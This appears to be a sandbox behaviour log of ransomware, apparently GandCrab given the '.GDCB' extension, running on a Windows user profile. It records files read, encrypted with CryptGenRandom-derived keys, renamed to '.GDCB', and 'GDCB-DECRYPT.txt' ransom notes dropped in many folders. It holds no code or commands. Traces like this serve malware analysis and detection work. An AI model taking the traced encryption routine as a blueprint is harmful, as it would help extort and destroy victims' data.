File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, size = 1048576, size_out = 87972 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, size = 87984 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CztjLRmT.bmp.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, size = 1048576, size_out = 76788 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, size = 76800 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ExocxBlrLmuRHv.gif.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, size = 1048576, size_out = 41790 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, size = 41792 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FCmH0Q4.bmp.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, size = 1048576, size_out = 15214 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, size = 15216 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\imbMbOER.ppt.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, size = 1048576, size_out = 36435 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, size = 36448 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ixwxy.png.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, size = 1048576, size_out = 26469 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, size = 26480 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\jxoh-EFt2nW-t9X.wav.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, size = 1048576, size_out = 68425 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, size = 68432 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ldeazaydq H9.jpg.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, size = 1048576, size_out = 56676 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, size = 56688 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LSI0fbp1d3.flv.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, size = 1048576, size_out = 98350 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, size = 98352 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lxRXkBM2nNswBBWWBk42.mp4.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\DQQHJZ8C\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\DQQHJZ8C\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\AddIns\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\AddIns\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\Style\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Bibliography\Style\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Credentials\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Credentials\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576 True 1
Fn
Data
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576 True 1
Fn
Data
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576 True 1
Fn
Data
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 1048576, size_out = 560327 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 560336 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\XLSTART\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Excel\XLSTART\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
